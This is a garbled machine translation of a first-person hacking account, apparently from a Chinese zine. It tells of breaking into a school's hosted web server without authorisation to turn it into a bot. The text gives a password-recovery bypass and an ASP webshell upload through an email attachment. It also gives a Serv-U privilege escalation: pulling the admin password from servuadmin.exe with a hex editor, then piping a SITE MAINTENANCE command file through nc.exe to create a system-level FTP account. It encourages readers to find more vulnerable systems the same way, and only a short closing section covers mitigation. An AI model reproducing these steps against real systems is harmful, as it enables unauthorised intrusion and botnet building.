Serv-U privilege escalation-record a Virtual Host Intrusion

Since the serv-u privilege limit was lifted, the Family held su.exe to cover the Web bag. The number of bots increased significantly and the quality increased. After the methods in the "Win2000 Virtual Host Intrusion Law" were widely spread, we started to have some high-bandwidth, large memory, and even the best bots with N CPUs, congratulations! ^_^ (audience: same joy ). However, we also met the old chicken that used n to fix the Serv-U Local Privilege Escalation Vulnerability and could not improve the privilege, today I will discuss how to catch these bots with my real intrusion.
1. A Network Office System
One month of cool and cool, I once again opened the school website of our high school. On the homepage, how nice they are to blow the school's network construction, the more I see it, the more depressing it is. I didn't even let me in the data center for three years at school, and even remember that I had no data center. I thought, why should I give them a wake-up reminder? Alas, I have taken the lead in saving the world, who told me to be handsome? ^_^ (the audience started preparing for the bad eggs, fried tomatoes, and so on ).
I immediately took out the X-SCAN check all options to a large scan, the server is Windows2000 Advanced Server version, the server only opened port 80, 21, 25, 3389, the server should have a firewall, or, if TCP/IP filtering is enabled, no vulnerability scan is available, and SP4 + is the latest patch. Such a server should not come out of the network management configurations of our senior high school. This is a bit difficult to look down on, but it should also be a fact. I checked the IP address, which is from Beijing Unicom. It seems that the VM is used.
Open the animation now, as shown in figure 1 ). This tool is very powerful. First, you can use whois.webhosting.info to query all domain names bound to an IP address, and then import the software to automatically query the pages or forums that can be uploaded, Article System databases, such as the upload page and migration page of dvbbs 7.0, the vulnerability page of qingchuang article system, and the online database. The vulnerability page can be exploited by exploiting the vulnerabilities that come with the software. Program Directly upload an ASP Trojan. I am very disappointed with the scan results. This server may be newly opened. There are only a few websites, and there is no Upload Vulnerability.

Figure 1
When I was depressed, I opened the homepage and loose it. The homepage was written in pure HTML. Only one record was written in ASP, and the latest version of "fengyue record" was used. I tried weak passwords and made a mistake. The database address of the default "fengyue record" is marked, but the database address is not changed, but the anti-download process is implemented.
Bored, he randomly opened his so-called "Enterprise Network Office System". The weak password didn't go in, and suddenly he saw a "if you forget the password, please retrieve your password from here! ", Click and enter the Admin name. The password prompt is "0000". I also lost "0000" at will. Haha, correct. Go to the Management page (figure 2 ). After going in, I felt like I had introduced the A4 network teaching system in XFile. I tried uploading the page if I could upload anything, I saw a "report file" in "Administrative Management" and found an ASP Trojan 2005 at the top of the ocean. The upload was successful, why can't I find any place to transfer to? (figure 3 ). I found a "personal mailbox" and wrote a letter to myself. The attachment is directly attached to the top 2005 of the ocean and opened the inbox. Haha, ASP attachments can be opened directly, obtain webshell (figure 4 ).
Later, the test found that there are more than N office systems on the Internet. Enter "Enterprise Network Office System" in Baidu and click OK. Most of the questions and answers prompted with the default password just now can be entered, get webshell soon. You can try it.

Figure 2

Figure 3

Figure 4

2. desperate permission escalation
with webshell, you can modify the homepage of the website to remind the school administrator. However, this host is found to be extremely fast during use, it must be nice to make it a zombie. You can download it, scan the zombie, haha, or use QQ to grade it, so you may be excited and want to laugh.
since I wanted to turn him into a zombie, my suffering began. I started my desperate permission escalation journey.
enter the net user in webshell. The top ASP Trojan prompts "file opening failed" "No permission ". It seems that the access to cmd. EXE by guest is restricted, so we can upload it to cmd. EXE by ourselves. Upload successful. Then customize the cmd. EXE path in the ASP Trojan on the top of the ocean, but still cannot execute the CMD command. Then let's look at C: \ winnt \ system32 \ inetsrv \ data does the Directory have the write permission? the Windows directory is fully controlled by everyone by default (for details, see "XFile 12" a difficult Virtual Host Intrusion "), CMD upload succeeded. Execute the Net start command. FTP is actually using Serv-U. I have a sneer. Hey, blame you for your hardships. After that, the serv-u Privilege Escalation program su.exe was uploaded to run C: \ winnt \ system32 \ inetsrv \ data \ su.exe "net suer intruder $0123123/Add" with hope ". The result returns the following result:
<220 Serv-u ftp server V5.0 for Winsock ready...
User localadministrator
<331 user name Okay, need password.
************************************* * ****************
pass # l @ $ AK #. LK; 0 @ P
<530 not logged in.
Figure 5

the Administrator has fixed the Serv-U Local Privilege Escalation Vulnerability. He modified the default sverv-u Administrator name or password, and the permission escalation will inevitably fail. Depressed!
we all know how difficult it is to use a vulnerability on Windows + SP4 to escalate permissions. It is so difficult to make such a good hole that it is blocked, unwilling ...... 55555 ......
continue to slide through the host and find that there are no redundant services on the host. The solution to replace the service is basically ruined. Using ASP, which has been circulated on the Internet, directly add the administrator user's Code .
after that, I went up and down every day, that is, there was nowhere to go. Basically all the methods I could use were used, so I went to the Administrator to ask for the password with my dagger and carrying the package.

3. When I was dreaming, I always dreamed that I could easily escalate my permissions and win it. Then I used winhex to change the Serv-U file, I made up the local privilege escalation vulnerability, and then the zombie is my own. I can use QQ to act as a QQ proxy. Haha, Hahahaha ...... (I was beaten n + 1 times by my roommates during the middle of the night) Suddenly ...... Hexadecimal ...... Modify the Default User Name ...... Password ...... I thought of it! I woke up and was so excited that I couldn't sleep. (The next day was so miserable. During the exam, I almost fell asleep when I was sleepy ).
I suddenly figured it out. The Administrator fixed this vulnerability to fix the original password # l @ $ AK # in the program #. LK; 0 @ P is changed to something else, so the password he changed is still in the program. If I can get it down, I will use winhex or xhex to serve the sentence, do not believe it.
on the second day of the archaeological literature generation, the question was old and smelly. After a while, I ran to the server. (The audience wore black cloak and sunglasses, I really thought I was Neo, cold ......), Immediately open the ocean top 2005 on the server, and directly view the c: \ Program Files \ Serv-U \ directory. After reading the file, find servuadmin.exe and download it with "stream download" at Ocean top 2005. Excited ...... Nosebleed ......
I opened servuadmin.exe with xhex. press Ctrl + F, enter localadministrator, and click search. Haha, the password and "localadministrator" are the same. I found them. The password is 85457845152145 "! This happens that the Administrator has not modified the user name. How can we search for the modified User Name? Press the shortcut key Ctrl + G to jump to this address to find the user name and password. (Figure 6) What if the Administrator has the port? This is simple. Let's look at netstat-An in webshell and find Port 127.0.0.1: XXXXX. You can guess it. In addition, an error may occur when you modify the Management port. If you modify a few of them, the error cannot be managed.
figure 6

With the password, everything went smoothly. My head was stupid, so I started to use a stupid method. Upload nc.exeand su.txt to the server, and then c: \ winnt \ system32 \ inetsrv \ data \ nc.exe 127.0.0.1-P 43958 <C: \ winnt \ system32 \ inetsrv \ data \ su.txt

Su.txt contains the following content:
User localadministrator
Pass 85457845152145
Site Maintenance
-Setdomain
-Domain = myftp | 0.0.0.0 | 22 |-1 | 1 | 0
-Dyndnsenable = 0
Dynipname =
-Setusersetup
-IP = 0.0.0.0
-Portno = 21
-User = test
-Password = 123456
-Homedir = c :\
-Maintenance = System
-Ratios = none
Access = C :\| rwamelcdp
-Getusersetup
In this way, the server creates a new domain named myftp. The account is "test", the password is "123456", the user directory is "C: \", and the user permission is "Serv-U System Administrator. Create a new server in the local Serv-U, fill in the IP address of the server, fill in port 22, user name test, password 123456, but login fails. For some reason, the server may have used TCP/IP filtering or _ blank "> firewall, which does not allow access to non-authenticated ports. If this port is changed to 21, it will not work. I tested two servers, but it failed for some reason.
Later I thought that since I had a password, I directly changed the password "# l @ $ AK #. LK; 0 @ P "is not enough for the password I got! Find out the code used to exploit this Local Privilege Escalation Vulnerability, change the password, and compile the code successfully. Try it on that server! Get system permissions! I immediately added a user, and the zombie has already opened the terminal service, which is very convenient!
The intrusion is over, and the rest is cleaning the battlefield.
After logging on to the zombie through the terminal, we found that the stuff submitted by NC was effective. A new myftp domain exists in the server. The connection failed because the zombie was installed with a firewall. (Figure 7)

Figure 7
Later, I thought that many of my friends didn't install C language on their machines. It is inconvenient to use it. I wrote a graphical interface configuration program (figure 8) using BCB, which I just learned! Secret, find "localadministrator" and "# l @ $ AK #. lk; 0 @ P", and change it to your own password.

Figure 8
Iv. post-event thinking
How can I fix this Serv-U Local Privilege Escalation Vulnerability? This simple modification of the default password in the file is obviously insecure. We can leave the Internet Guest Account Serv-U with the permission to install directory browsing, so that we cannot download the program to find the password (figure 9 ). However, this vulnerability can still be exploited, such as local user privilege escalation.

Figure 9
Think about it, because Serv-U runs with the system permission by default when starting a service, so it is possible to be elevated by permissions. If we change the starting user of Serv-U to a user group, there will be no so-called permission escalation. (Figure 10) However, this low-Permission user must have full control over the Serv-U installation directory and the directory or drive letter that provides the FTP service. Tests show that Serv-U started by users in common groups cannot add or delete users. Everything else works.